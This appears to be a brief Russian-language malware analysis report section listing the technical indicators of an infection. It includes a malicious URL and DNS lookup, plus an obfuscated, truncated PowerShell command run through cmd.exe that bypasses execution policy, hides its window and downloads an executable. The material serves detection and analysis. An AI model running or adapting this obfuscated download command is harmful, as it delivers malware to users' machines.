Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^Er^ShEll.eX^E^ ^-^Ex^E^cUTIOnpoliCY ^B^YpA^sS^ -nOpR^oFILE^ -^WiNdoW^s^tYle^ HIddE^n^ (^n^E^W-^Obje^CT^ SYS^tem.^N^e^T.W^EBCLiE^nT)^.^DOwNlo^a^DFiLe('http://www.zoerpole...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "POW^Er^ShEll.eX^E^ ^-^Ex^E^cUTIOnpoliCY ^B^YpA^sS^ -nOpR^oFILE^ -^WiNdoW^s^tYle^ HIddE^n^ (^n^E^W-^Obje^CT^ SYS^tem.^N^e^T.W^EBCLiE^nT)^.^DOwNlo^a^DFiLe('http://www.zoerpole...' (со скрытым окном)